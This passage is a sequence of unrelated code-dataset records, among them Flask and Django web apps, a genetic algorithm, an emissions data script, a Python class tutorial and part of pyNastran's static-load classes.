back_populates='solicitacoes')\n\n __mapper_args__ = {\n 'polymorphic_identity': 'EQUIPAMENTO'\n }\n \n # Verifica se o usuário já possui uma solicitação não finalizada\n def verificar_existente_usuario(usuario):\n solicitacao = SolicitacaoEquipamento.query.filter_by(autor=usuario).filter_by(\n ativo=True).order_by(SolicitacaoEquipamento.id.desc()).first()\n if solicitacao:\n if 
(solicitacao.status.name != 'CANCELADO' and \n solicitacao.status.name != 'FECHADO'):\n return True\n return False\n \n # Cria uma nova solitação de sala para ser inserida\n def criar(status, form):\n return SolicitacaoEquipamento(tipo_eqp_id=form.tipo_equipamento.data,\n turno_id=form.turno.data,\n usuario_id=current_user.id,\n descricao=form.descricao.data,\n quantidade=form.qtd_preferencia.data,\n data_inicio_pref=form.data_inicio_pref.data,\n data_fim_pref=form.data_fim_pref.data,\n status=status) \n \n def inserir(self):\n return super().inserir()\n \n\n# Classe para os turnos possíveis para solicitações\nclass Turno(db.Model):\n __tablename__ = 'turnos'\n __table_args__ = {'extend_existing': True}\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(20), unique=True, nullable=False)\n hora_inicio = db.Column(db.Time, nullable=False)\n hora_fim = db.Column(db.Time, nullable=False)\n ativo = db.Column(db.Boolean, nullable=False, default=True)\n\n # Um turno pode estar associado a múltiplas solicitações\n solicitacoes = db.relationship('Solicitacao', back_populates='turno')\n \n def __repr__(self):\n return f\"{self.name} ({self.hora_inicio} ~ {self.hora_fim})\"\n \n def recuperar_tudo():\n return Turno.query.filter_by(ativo=True).all()\n \n def recuperar_id(turno_id):\n return Turno.query.filter_by(id=turno_id).filter_by(ativo=True).first_or_404()\n \n def criar(form):\n return Turno(name=form.nome.data, \n hora_inicio=form.hora_inicio.data, \n hora_fim=form.hora_fim.data)\n \n def inserir(self):\n db.session.add(self)\n db.session.commit()\n ","repo_name":"DWNeo/UniGerencia","sub_path":"app/models/solicitacoes.py","file_name":"solicitacoes.py","file_ext":"py","file_size_in_byte":15045,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7404371593","text":"import json\n\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import render\n\n# Create your views here.\nfrom django.views import View\n\nfrom recommendation.models import Recommendation\nfrom recommendation.sparql_queries import query_common_p_o, query_most_common_p_s, common_instance_of\nfrom topics.models import Course, Learner_Course_Record, UserProfile\n\n\nclass RecommendationView(View):\n def get(self, request):\n courses = Learner_Course_Record.objects.filter(learner__user=request.user)\n\n taken_courses = [course.course.id for course in courses]\n recommendations = Recommendation.objects.filter(user=request.user, version=1).exclude(course__in=taken_courses).order_by(\"-rating\")[:10]\n rec_courses = [recommendation.course for recommendation in recommendations]\n if not rec_courses:\n rec_courses = Course.objects.filter(published=True).exclude(id__in=taken_courses).exclude(teacher=request.user).order_by(\"-pubdate\")\n\n return render(request, 'recommendation/recommendation.html', {\"courses\": rec_courses})\n\n\n\"\"\"\nclass Recommendation(View):\n def get(self, request):\n courses = Learner_Course_Record.objects.filter(learner__user=request.user)\n\n taken_courses = [course.course.id for course in courses]\n\n labels = [label.identifier for course in courses for label in course.course.glossary_set.all()]\n\n from collections import Counter\n\n labels_count = Counter(labels)\n\n rec = {}\n for label in labels_count:\n c = Course.objects.filter(glossary__identifier=label).exclude(id__in=taken_courses).exclude(teacher=request.user)\n for course in c:\n if course.id in rec:\n rec[course.id] += labels_count[label]\n else:\n 
rec[course.id] = labels_count[label]\n sorted_rec = sorted(rec.items(), key=lambda kv: (kv[1], kv[0]), reverse=True)\n rec_courses = []\n for s in sorted_rec:\n rec_courses.append(Course.objects.get(id=s[0]))\n if len(rec_courses) > 4:\n break\n\n return render(request, 'recommendation/recommendation.html', {\"courses\": rec_courses})\n\"\"\"\n\n\nclass Recommendation_deneme(View):\n def get(self, request, *args, **kwargs):\n user = request.user\n pk = self.kwargs.get(\"pk\")\n courses = Learner_Course_Record.objects.filter(learner__user=user)\n\n taken_courses = [course.course.id for course in courses]\n\n labels = [label.identifier for course in courses for label in course.course.glossary_set.all()]\n labels_name = [label.name for course in courses for label in course.course.glossary_set.all()]\n course_labels = {}\n course = Course.objects.get(pk=pk)\n\n c_labels = [label.identifier for label in course.glossary_set.all()]\n c_labels_name = [label.name for label in course.glossary_set.all()]\n course_labels[course.id] = c_labels\n rating = {\"labels\": labels_name, course.title: c_labels_name}\n for course in course_labels:\n r = query_common_p_o(labels, course_labels[course])\n rating[\"query_common_p_o\"] = r\n rating[\"c_p_o\"] = 0\n if r:\n rating[\"c_p_o\"] = r['ocount_ratio'] + r['pcount_ratio'] + r['scount_ratio']\n q = query_most_common_p_s(labels, course_labels[course])\n\n rating[\"query_most_common_p_s\"] = q\n rating[\"c_p_s\"] = 0\n if q:\n rating[\"c_p_s\"] = q['ocount_ratio'] + q['pcount_ratio'] + q['scount_ratio']\n\n s = common_instance_of(labels, course_labels[course])\n\n rating[\"common_instance_of\"] = s\n rating[\"c_i\"] = 0\n if s:\n rating[\"c_i\"] = s['ratio']\n print(user, course, rating)\n ratingT = rating[\"c_p_o\"] + rating[\"c_p_s\"] + rating[\"c_i\"]\n rating[\"rating\"] = ratingT\n return render(request, 'recommendation/recommendation.html', {\"courses\": {}, \"rating\": json.dumps(rating)})\n","repo_name":"kasimbozdag/swe_574","sub_path":"ocial/ocial_project/recommendation/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4067,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"25304134682","text":"#! 
cat input | python3 main.py\nfrom random import random\nfrom random import randint\n\nPOP_SIZE = 50 #/* population size (must be set to an odd number) */\nG_LENGTH = 10 #/* number of bits in an individual's genotype */ \nMAX_GEN = 20 #/* number of generations */\nM_RATE = 0.1 #/* mutation rate (0 to 1) */ \n\n\n#/********************************************************************\n# Initialize the genes\n# Args gene[p][i] : i-th component of gene p\n#********************************************************************/\ndef init_gene(gene):\n# /* Initialize genes: draw a random number in 0-1; the bit is 1 if it is \n# 0.5 or more, 0 if it is less than 0.5 */\n print(\"<< Initial population >>\");\n return [[random() >= 0.5 and 1 or 0 for i in p] for p in gene]\n\n\n#/********************************************************************\n# Compute the fitness\n# Args gene[p][i] : i-th component of gene p\n# fitness[p] : fitness of gene p\n#********************************************************************/\ndef calc_fitness(gene, fitness):\n for p, row in enumerate(gene):\n# /* Fitness = number of 0s in the first 5 bits + number of 1s in the last 5 bits */\n n0 = row[:G_LENGTH//2].count(0)\n n1 = row[G_LENGTH//2:].count(1)\n fitness[p] = n0 + n1\n\n\n#/**********************************************************************\n# Display the genes & compute the maximum and average fitness\n# Args t : generation number\n# gene[p][i] : i-th component of gene p\n# fitness[p] : fitness of gene p\n#**********************************************************************/\ndef show_gene(t, gene, fitness):\n# /* Display the individuals and their fitness */\n # for g in gene: print(\"gene:\", g)\n # print(\"fitness:\", fitness)\n\n# /* Compute the average and maximum fitness */\n avg_fit = sum(fitness) / len(fitness)\n max_fit = max(fitness)\n\n# /* Display the average and maximum fitness */\n print(\"Average fitness : %lf\" % avg_fit);\n print(\"Maximum fitness : %lf\" % max_fit);\n print()\n\n\n#/**********************************************************************\n# Swap the fitness and genes of individuals p1 and p2\n# Args p1, p2 : gene indices\n# gene[p][i] : i-th component of gene p\n# fitness[p] : fitness of gene p\n#**********************************************************************/\ndef swap_gene(p1, p2, gene, fitness):\n# /* Swap the genotypes (exchange the values of gene p1 and gene p2) */\n gene[p1], gene[p2] = gene[p2], gene[p1]\n\n# /* Swap the fitness (exchange the fitness values of gene p1 and gene p2) */\n fitness[p1], fitness[p2] = fitness[p2], fitness[p1]\n\n\n#/**********************************************************************\n# Copy the fitness and genotype of individual p1 to p2\n# Args p1, p2 : gene indices\n# gene[p][i] : i-th component of gene p\n# fitness[p] : fitness of gene p\n#**********************************************************************/\ndef copy_gene(p1, p2, gene, fitness):\n# /* Copy the gene (copy gene p1 onto gene p2) */\n gene[p2] = gene[p1][:]\n\n# /* Copy the fitness (copy the fitness of gene p1 onto gene p2) */\n fitness[p2] = fitness[p1]\n\n\n#/**********************************************************************\n# Elitism\n# (copy the fittest individual's data over the least fit individual)\n# Args gene[p][i] : i-th component of gene p\n# fitness[p] : fitness of gene p\n#**********************************************************************/\ndef elite(gene, fitness):\n# /* Find the fittest individual (max_p) and the least fit one (min_p) */\n max_p = max(enumerate(fitness), key=lambda x:x[1])[0]\n min_p = min(enumerate(fitness), key=lambda x:x[1])[0]\n\n# /* Copy the fittest individual over the least fit one */\n copy_gene(max_p, min_p, gene, fitness)\n# /* Move the fittest individual to position 0 */\n swap_gene(0, max_p, gene, fitness)\n\n\n#/**********************************************************************\n# Roulette-wheel selection\n# Args gene[p][i] : i-th component of gene p\n# fitness[p] : fitness of gene p\n#**********************************************************************/\ndef reproduction(gene, fitness):\n# /* Compute sum_of_fitness, one full turn of the roulette wheel */\n sum_of_fitness = sum(fitness) #/* total fitness of all individuals */\n new_gene = list(range(POP_SIZE))\n\n# /* Spin the roulette POP_SIZE times to select the next generation */\n# /* index of the selected individual */\n for p in 
range(POP_SIZE):\n# /* Spin the roulette to pick a spot \n# r : selected position (0 <= r <= sum_of_fitness) */\n r = sum_of_fitness * random() #/* selected position on the roulette wheel */\n\n# /* Find which individual the selected spot belongs to\n# num : index of the selected individual (0 <= num <= POP_SIZE-1) */\n num = 0 #/* index of the selected individual */\n\n border = fitness[0] #/* boundary between individuals on the roulette wheel */\n while border < r:\n num += 1\n border += fitness[num]\n\n# /* Assign the gene */\n new_gene[p] = gene[num][:]\n\n# /* Copy the genes */\n for i in range(1, len(gene)):\n gene[i] = new_gene[i]\n\n\n#/**********************************************************************\n# One-point crossover\n# Args gene[p][i] : i-th component of gene p\n#**********************************************************************/\ndef crossover(gene):\n# /* Pick the crossover position randomly in the range 1 to G_LENGTH-1 and\n# swap everything after it.\n# Pair parents as gene[1] with gene[2], gene[3] with gene[4], ... */\n c_pos = randint(1, G_LENGTH - 1) #/* crossover position (1 <= c_pos <= G_LENGTH-1) */ \n for p in range(1, len(gene) - 1, 2):\n for i in range(c_pos, G_LENGTH):\n #/* genotype of parent 1: gene[p][i] */ \n #/* genotype of parent 2: gene[p + 1][i] */ \n gene[p][i], gene[p + 1][i] = gene[p + 1][i], gene[p][i]\n\n\n#/**********************************************************************\n# Mutation\n# Args gene[p][i] : i-th component of gene p\n#**********************************************************************/\ndef mutation(gene):\n# /* Draw a random number in 0-1; if its value is at most M_RATE,\n# flip the gene value (0 becomes 1, 1 becomes 0) */\n for g in gene[1:]:\n for i, v in enumerate(g):\n if random() < M_RATE:\n g[i] = (not v) * 1\n\n\n#/**********************************************************************\n# Main program\n#**********************************************************************/\n#/* Display the simulation settings */\nprint(\"Population size : %d\" % POP_SIZE);\nprint(\"Gene length : %d bit\" % G_LENGTH);\nprint(\"Mutation rate : %lf\" % M_RATE);\n\ngene = [[0 for j in range(G_LENGTH)] for i in range(POP_SIZE)]\nfitness = [0 for x in range(POP_SIZE)]\n\ngene = init_gene(gene) #/* initialize the genes */\ncalc_fitness(gene,fitness) #/* compute the fitness */\nshow_gene(0,gene,fitness) #/* display */\n\nfor t in range(1, MAX_GEN + 1):\n print(\"<< Generation : %d >>\" %t)\n elite(gene, fitness) #/* elitism */ \n reproduction(gene, fitness) #/* roulette selection */ \n crossover(gene) #/* simple crossover */ \n mutation(gene) #/* mutation */ \n calc_fitness(gene, fitness) #/* compute the fitness */\n show_gene(t, gene, fitness) #/* display */\n","repo_name":"ctare/osn","sub_path":"GA/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7862,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"34543144126","text":"from flask import render_template, url_for, flash, redirect, request\nfrom flask_login import current_user, login_user, logout_user, login_required\nfrom app import app, db\nfrom app.forms import LoginForm, RegistrationForm, AnswerForm, UserPreferencesForm, UserSettingsForm\nfrom app.models import User, Question, Answer\nfrom werkzeug.urls import url_parse\nfrom datetime import datetime\n\n\n@app.before_request\ndef before_request():\n if current_user.is_authenticated:\n current_user.last_seen = datetime.utcnow()\n db.session.commit()\n\n\n@app.route('/')\n@app.route('/browse')\n@app.route('/browse/')\n@login_required\ndef browse():\n return render_template('browse.html', title='Browse')\n\n\n@app.route('/login', methods=['GET', 'POST'])\n@app.route('/login/', methods=['GET', 'POST'])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for('browse'))\n form = LoginForm()\n if form.validate_on_submit():\n user = User.query.filter_by(username=form.username.data).first()\n if user is None or not 
user.check_password(form.password.data):\n flash(f'Invalid username or password')\n return redirect(url_for('browse'))\n login_user(user, remember=form.remember_me.data)\n\n next_page = request.args.get('next')\n if current_user.last_seen:\n # Set next_page to browse if not set and also set it to browse in case external website is provided\n if not next_page or url_parse(next_page).netloc != '':\n next_page = url_for('browse')\n else:\n next_page = url_for('user_preferences')\n return redirect(next_page)\n return render_template('login.html', form=form, title='Login')\n\n\n@app.route('/logout')\n@app.route('/logout/')\ndef logout():\n logout_user()\n return redirect(url_for('browse'))\n\n\n@app.route('/register', methods=['GET', 'POST'])\n@app.route('/register/', methods=['GET', 'POST'])\ndef register():\n if current_user.is_authenticated:\n return redirect(url_for('browse'))\n form = RegistrationForm()\n if form.validate_on_submit():\n user = User(username=form.username.data, email=form.email.data)\n user.set_password(password=form.password.data)\n db.session.add(user)\n db.session.commit()\n flash(f'Thanks for registering!')\n return redirect(url_for('login'))\n return render_template('register.html', form=form, title='Register')\n\n\n@app.route('/profile')\n@app.route('/profile/')\n@login_required\ndef user_profile():\n return redirect(url_for('profile', username=current_user.username))\n\n\n@app.route('/profile/', methods=['GET', 'POST'])\n@app.route('/profile//', methods=['GET', 'POST'])\ndef profile(username):\n user = User.query.filter_by(username=username).first_or_404()\n questions = Question.query.filter_by(type='summary').all()\n return render_template('profile.html', user=user, questions=questions, Answer=Answer, title=user.username)\n\n\n@app.route('/answer/', methods=['GET', 'POST'])\n@app.route('/answer//', methods=['GET', 'POST'])\n@login_required\ndef answer(id):\n # Figure out if answer already exists\n question = Question.query.get(int(id))\n answer = Answer.query.filter_by(question=question).first()\n\n form = AnswerForm()\n # If answer doesn't yet exist\n if answer is None:\n if form.validate_on_submit():\n answer = Answer(body=form.body.data, author=current_user, question=question)\n db.session.add(answer)\n db.session.commit()\n flash(f'Your response has been recorded')\n return redirect(url_for('profile', username=current_user.username))\n elif request.method == 'GET':\n form.body.data = answer.body\n # Validate an existing answer\n elif form.validate_on_submit():\n answer.body = form.body.data\n db.session.commit()\n flash(f'Your response has been edited')\n return redirect(url_for('profile', username=current_user.username))\n return render_template('answer.html', form=form, question=question, title='Answer')\n\n\n@app.route('/settings')\n@app.route('/settings/')\n@login_required\ndef settings_menu():\n return render_template('settings_menu.html', title='Settings')\n\n\n@app.route('/preferences', methods=['GET', 'POST'])\n@app.route('/preferences/', methods=['GET', 'POST'])\n@login_required\ndef user_preferences():\n form = UserPreferencesForm()\n questions = Question.query.filter_by(type='Basic').all()\n #TODO- Test preferences and finish UserPreferencesForm validation\n return render_template('user_preferences.html', form=form, title='Preferences')\n\n\n@app.route('/user_settings', methods=['GET', 'POST'])\n@app.route('/user_settings/', methods=['GET', 'POST'])\n@login_required\ndef user_settings():\n form = UserSettingsForm(current_user.email, 
current_user.username)\n if request.method == 'GET':\n form.email.data = current_user.email\n form.username.data = current_user.username\n form.gender.data = current_user.gender\n form.birthday.data = current_user.birthday\n form.city.data = current_user.city\n form.state.data = current_user.state\n form.zip_code.data = current_user.zip_code\n form.privacy.data = current_user.privacy\n elif form.validate_on_submit():\n current_user.email = form.email.data\n current_user.username = form.username.data\n current_user.gender = form.gender.data\n current_user.birthday = form.birthday.data\n current_user.city = form.city.data\n current_user.state = form.state.data\n current_user.zip_code = form.zip_code.data\n current_user.privacy = form.privacy.data\n db.session.commit()\n flash(f'Your settings have been updated')\n return redirect(url_for('settings_menu'))\n return render_template('user_settings.html', form=form, title='User Settings')\n","repo_name":"dtfrancisco/Lang-Match","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":5905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25158048916","text":"import os\nfrom pandas import DataFrame, read_excel\n\nyear = 2012\ntransport_dir = os.environ['TRANSPORT_DIR']\n\n# Emissions\nprint('Processing EDGAR data')\n\nresults_df = DataFrame()\ndata_dir = transport_dir + '/edgar_data/'\nunit_scale = 1e9 / 1e12\nemissions_files = ['v432_CO2_excl_short-cycle_org_C_1970_2012', 'v432_CO2_org_short-cycle_C_1970_2012'\n , 'v432_PM2.5_fossil_1970_2012', 'v432_PM2.5_bio_1970_2012', 'v432_PM10_1970_2012'\n , 'v432_CH4_1970_2012', 'v432_NOx_1970_2012', 'v432_SO2_1970_2012', 'v432_N2O_1970_2012'\n , 'v432_BC_1970_2012', 'v432_CO_1970_2012', 'v432_NMVOC_1970_2012']\n\ntransport_cats = ['Domestic aviation', 'Road transportation', 'Rail transportation', 'Inland navigation'\n , 'Other transportation']\n\ninternational_cats = ['Int. Shipping', 'Int. 
Aviation']\n\n# Calculate totals for 2012\nfor file in emissions_files:\n\n # Read raw data\n print('Reading ' + file)\n df = read_excel(data_dir + file + '.xls', header=7)\n\n totals = {}\n running_total = 0\n\n for tt in transport_cats:\n cat_total = df[df['IPCC_description'] == tt][year].sum() * unit_scale\n totals[tt] = cat_total\n running_total = running_total + cat_total\n\n for it in international_cats:\n cat_total = df[df['Name'] == it][year].sum() * unit_scale\n totals[it] = cat_total\n running_total = running_total + cat_total\n\n totals['all_other'] = (df[year].sum() * unit_scale) - running_total\n\n # Append to results container\n totals['filename'] = file\n results_df = results_df.append(totals, ignore_index=True)\n\nresults_df.to_csv(transport_dir + '/edgar_transport_summary.csv')\n\n# Calculate trend in CO2\nprint('Calculating trend in transport emissions')\nco2_emissions_files = ['v432_CO2_excl_short-cycle_org_C_1970_2012', 'v432_CO2_org_short-cycle_C_1970_2012']\n\ndf_co2 = read_excel(data_dir + co2_emissions_files[0] + '.xls', header=7)\ndf_short = read_excel(data_dir + co2_emissions_files[1] + '.xls', header=7)\n\nresults = []\n\nfor trend_year in range(2000, 2013):\n totals = {'year': trend_year}\n\n series_name = 'co2_sc'\n for it in international_cats:\n cat_total = df_co2[df_co2['Name'] == it][trend_year].sum() * unit_scale\n totals[series_name + '_' + it] = cat_total\n\n totals[series_name + '_total'] = df_co2[trend_year].sum() * unit_scale\n\n series_name = 'co2_excl_sc'\n for it in international_cats:\n cat_total = df_short[df_short['Name'] == it][trend_year].sum() * unit_scale\n totals[series_name + '_' + it] = cat_total\n\n totals[series_name + '_total'] = df_short[trend_year].sum() * unit_scale\n\n results.append(totals)\n\nDataFrame(results).to_csv(transport_dir + '/edgar_intl_transport_trend.csv')\n\nprint('All finished')","repo_name":"spottedquoll/get_transport_emissions","sub_path":"edgar_emissions.py","file_name":"edgar_emissions.py","file_ext":"py","file_size_in_byte":2791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"12251353468","text":"def cats_and_dogs(cats_file, dogs_file):\n \n print(\"All Cats\")\n try:\n with open(cats_file) as catfile:\n cats = catfile.readlines()\n for cat in cats:\n print(cat.rstrip())\n except FileNotFoundError as fe:\n print(f\"{fe.filename} not found\")\n\n print(\"\\nAll Dogs\")\n try: \n with open(dogs_file) as dogfile:\n dogs = dogfile.readlines()\n for dog in dogs:\n print(dog.rstrip())\n except FileNotFoundError as fe:\n print(f\"{fe.filename} not found\")\n \ncats_and_dogs(\"cats.txt\", \"dogs1.txt\")","repo_name":"apulijala/python-crash-course","sub_path":"chapter10/cats_and_dogs.py","file_name":"cats_and_dogs.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
+{"seq_id":"29342099062","text":"import numbers\nimport pickle\nimport time\nfrom collections import UserDict\n\n\nclass Car:\n # Class variable, shared by all instances\n # Using a mutable object here would make every instance affect the others\n author = 'zcx'\n\n def __init__(self, name, model):\n # Instance variables, unique to each instance\n self.name = name\n self.model = model\n\n def show(self):\n print(self.name, self.model)\n\n\na = Car(1, 2)\nCar.show = lambda x: print(123)\na.show() # 123\n\n\n# inherit from Car\nclass ECar(Car):\n def __init__(self, name, model, battery):\n super().__init__(name, model)\n self.battery = battery\n # A name with one leading underscore (e.g. _spam) is by convention a non-public part of the API\n # Double-underscore private attributes get automatic name mangling:\n # rewritten as _[ClassName]__[attributeName], e.g. _ECar__id\n self.__id = time.time()\n\n def __iter__(self):\n \"\"\"\n Make the object iterable so it supports unpacking\n *self\n name, model, battery = c\n \"\"\"\n return (i for i in (self.name, self.model, self.battery))\n\n # property implements access control, exposed through getter, setter and deleter\n # a getter is generated by default\n @property\n def id(self):\n ...\n\n @id.getter\n def id(self):\n return self.__id\n\n def __bytes__(self):\n return pickle.dumps(self)\n\n # Class method\n # called on the class (an instance works too), e.g. C.f() or C().f()\n # the first argument is always the class itself (the caller does not pass it); cls is the class, self is an instance\n @classmethod\n def from_bytes(cls, bytes):\n return pickle.loads(bytes)\n\n # Static method\n # called on the class (an instance works too), e.g. C.f() or C().f(); essentially a plain function\n @staticmethod\n def hello_world():\n print(\"hello world\")\n\n def __hash__(self, h=0):\n for attr in self:\n h ^= hash(attr)\n return h\n\n def __eq__(self, other):\n for s, o in zip(self, other):\n if s != o:\n return False\n return True\n\n def show(self):\n print(*self)\n\n\nc = ECar('byd', 'han', 'kylin')\nc.show()\ne = ECar.from_bytes(bytes(c))\ne.show()\nprint(e is c) # False\nprint(hash(e))\n\n# name mangling: e.__id raises AttributeError: 'ECar' object has no attribute '__id'\nprint(list(filter(lambda x: 'id' in x, dir(e)))) # ['_ECar__id']\n\n# access control: e.id = 5 raises AttributeError: property 'id' of 'ECar' object has no setter\ne._ECar__id = 5\n\nprint(e.id is e._ECar__id) # True\nprint(e.__dict__) # {'name': 'byd', 'model': 'han', 'battery': 'kylin', '_ECar__id': 5}\n\n\nclass Student:\n # __slots__ declares all attributes of the class; its value is an iterable of strings\n # instances cannot use attributes other than the names listed in __slots__\n # __dict__ and __weakref__ are no longer created, which saves memory and speeds up attribute access\n # subclasses do not inherit __slots__; to support weak references, add '__weakref__' to __slots__\n __slots__ = ('id', 'name')\n\n def __init__(self, id, name):\n self.id = id\n self.name = name\n # self.x = 1 AttributeError: 'Student' object has no attribute 'x'\n\n\ns = Student(1, 'abc')\n\n\n# print(s.__dict__) AttributeError: 'Student' object has no attribute '__dict__'.\n\n\nclass MyDict(dict):\n # methods overridden in a subclass of a built-in type are not called implicitly\n def __setitem__(self, key, value):\n print('no set', self)\n return\n\n\nd = MyDict(a=1, b=2, c=3)\nprint(d) # {'a': 1, 'b': 2, 'c': 3}\nd['c'] = 4 # no set {'a': 1, 'b': 2, 'c': 3}\nd.update(c=5)\nprint(d) # {'a': 1, 'b': 2, 'c': 5}\n\n\n# __init__ and update ignored the overridden __setitem__; the method was not looked up on the subclass\n\n# native methods of built-in types are implemented in C and do not call methods overridden in subclasses, with very few exceptions\n# so, when you need to customize list, dict or str, subclassing UserList, UserDict or UserString is simpler\nclass MyDictV2(UserDict):\n def __setitem__(self, key, value):\n print('no set')\n\n\nd = MyDictV2(a=1, b=2, c=3) # no set no set no set\nprint(d) # {}\n\n\nclass Father():\n def ping(self):\n print('father: ', self)\n\n\nclass Son(Father):\n def pong(self):\n print('son: ', self)\n\n\nclass Daughter(Father):\n def pong(self):\n print('daughter: ', self)\n\n\nclass Dog(Son, Daughter):\n\n def daughter_pong(self):\n # calling an instance method through the class requires passing self explicitly, because this accesses an unbound method\n Daughter.pong(self)\n\n\nd = Dog()\nd.ping() # father: <__main__.Dog object at 0x104bdefd0>\nd.pong() # son: <__main__.Dog object at 0x104bdefd0> called following the declaration order of the superclasses\nd.daughter_pong() # daughter: <__main__.Dog object at 0x104bdefd0>\nprint(Dog.__mro__)\n\n\n# (<class '__main__.Dog'>, <class '__main__.Son'>, <class '__main__.Daughter'>,\n# <class '__main__.Father'>, <class 'object'>)\n# the method resolution order is, roughly, depth-first, left-to-right, without searching a class twice\n# in fact the dynamic algorithm linearizes the search order in a special way, preserving the left-to-right order declared by each class,\n# calling each parent class only once, and staying monotonic (a class can be subclassed without affecting the precedence of its parents)\n\n\n# inspect the method resolution order\ndef print_mro(cls):\n print(' '.join(c.__name__ for c in cls.__mro__)) # names from the generator, joined with spaces\n\n\nprint_mro(bool) # bool int object\nprint_mro(numbers.Complex) # Complex Number object\n\n\n# special methods are stored on the object's type, not on the instance\nclass C:\n pass\n\n\na = C()\n# print(len(a)) # TypeError: object of type 'C' has no len()\na.__len__ = lambda: 
+{"seq_id":"23778218736","text":"tamanho=int(input(\"enter how many numbers will be multiplied: \"))\r\n\r\nproduto = 1\r\n\r\ni=0\r\n \r\nwhile i \"ScrubLink\":\n data = dict(row)\n return cls(**data)\n\n def lnurl(self, req: Request) -> str:\n url = req.url_for(\"scrub.api_lnurl_response\", link_id=self.id)\n return lnurl_encode(url)\n","repo_name":"lnbits/scrub","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"}
+{"seq_id":"14829769646","text":"# pylint: disable=R0902,R0904,R0914\n\"\"\"\nAll static loads are defined in this file. This includes:\n\n * LOAD\n * GRAV\n * ACCEL\n * ACCEL1\n * FORCE / MOMENT\n * FORCE1 / MOMENT1\n * FORCE2 / MOMENT2\n * PLOAD\n * PLOAD1\n * PLOAD2\n * PLOAD4\n * PLOADX1\n\n\"\"\"\nfrom __future__ import (nested_scopes, generators, division, absolute_import,\n print_function, unicode_literals)\nfrom six.moves import zip\n\nimport numpy as np\nfrom numpy import array, cross, allclose, unique\nfrom numpy.linalg import norm # type: ignore\n\n#from pyNastran.bdf.errors import CrossReferenceError\nfrom pyNastran.utils import integer_types, float_types\nfrom pyNastran.bdf.cards.loads.loads import Load, LoadCombination\nfrom pyNastran.bdf.field_writer_8 import set_blank_if_default\nfrom pyNastran.bdf.cards.base_card import BaseCard, expand_thru, expand_thru_by, range # _node_ids,\nfrom pyNastran.bdf.cards.collpase_card import collapse_thru_by\n\nfrom pyNastran.bdf.bdf_interface.assign_type import (\n integer, integer_or_blank, double, double_or_blank, string, string_or_blank,\n integer_or_string, fields, integer_string_or_blank, integer_or_double)\nfrom pyNastran.bdf.field_writer_8 import print_card_8, print_float_8, set_string8_blank_if_default\nfrom pyNastran.bdf.field_writer_16 import (\n print_card_16, print_float_16, set_string16_blank_if_default)\nfrom pyNastran.bdf.field_writer_double import print_card_double, print_scientific_double\n\n\nclass LOAD(LoadCombination):\n \"\"\"\n +------+-----+------+------+----+-----+----+----+----+\n | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 |\n +======+=====+======+======+====+=====+====+====+====+\n | LOAD | SID | S | S1 | L1 | S2 | L2 | S3 | L3 |\n +------+-----+------+------+----+-----+----+----+----+\n | | S4 | L4 | etc. | | | | | |\n +------+-----+------+------+----+-----+----+----+----+\n | LOAD | 101 | -0.5 | 1.0 | 3 | 6.2 | 4 | | |\n +------+-----+------+------+----+-----+----+----+----+\n \"\"\"\n type = 'LOAD'\n\n def __init__(self, sid, scale, scale_factors, load_ids, comment=''):\n \"\"\"\n Creates a LOAD card\n\n Parameters\n ----------\n sid : int\n load id\n scale : float\n overall scale factor\n scale_factors : List[float]\n individual scale factors (corresponds to load_ids)\n load_ids : List[int]\n individual load_ids (corresponds to scale_factors)\n comment : str; default=''\n a comment for the card\n\n .. note:: MSC can handle self-referencing loads, NX cannot\n \"\"\"\n LoadCombination.__init__(self, sid, scale, scale_factors, load_ids,\n comment=comment)\n
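# A LOAD combination resolves to scale * sum(Si * Li). A minimal usage sketch,
# assuming pyNastran's add_* card helpers; the ids and magnitudes below are
# made up for illustration and are not part of this file:
#
# from pyNastran.bdf.bdf import BDF
# model = BDF()
# model.add_grid(10, [0., 0., 0.])
# model.add_force(sid=3, node=10, mag=100., xyz=[0., 0., 1.])   # FORCE 3
# model.add_moment(sid=4, node=10, mag=25., xyz=[1., 0., 0.])   # MOMENT 4
# # LOAD 101 = 0.5 * (2.0*load(3) + 1.0*load(4))
# model.add_load(sid=101, scale=0.5, scale_factors=[2.0, 1.0], load_ids=[3, 4])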
\n def get_load_types(self):\n \"\"\"\n .. note:: requires a cross-referenced load\n \"\"\"\n load_types = []\n for loads in self.load_ids:\n for load in loads:\n if isinstance(load, LOAD):\n lid = load.lid\n if isinstance(lid, list):\n load_types += load.type\n else: # int\n load_types += [load.type] + load.get_load_types()\n elif isinstance(load, (Force, Moment, PLOAD4, GRAV)):\n load_types += [load.type]\n else:\n raise NotImplementedError(load)\n\n load_types = list(set(load_types))\n #print(\"load_types = \", load_types)\n return load_types\n\n def get_reduced_loads(self, resolve_load_card=False, filter_zero_scale_factors=False):\n \"\"\"\n Get all load objects in a simplified form, which means all\n scale factors are already applied and only base objects\n (no LOAD cards) will be returned.\n\n Parameters\n ----------\n resolve_load_card : bool; default=False\n Nastran requires that LOAD cards do not reference other load cards.\n This feature can be enabled.\n filter_zero_scale_factors : bool; default=False\n Nastran does not filter loads with a 0.0 scale factor. So, if you\n have a 0.0 load, but are missing load ids, Nastran will throw a\n fatal error.\n\n .. todo:: lots more object types to support\n \"\"\"\n scale_factors = []\n loads = []\n simple_loads = [\n 'FORCE', 'FORCE1', 'FORCE2',\n 'MOMENT', 'MOMENT1', 'MOMENT2',\n 'PLOAD1', 'PLOAD2', 'PLOAD4',\n 'GRAV', 'ACCEL', 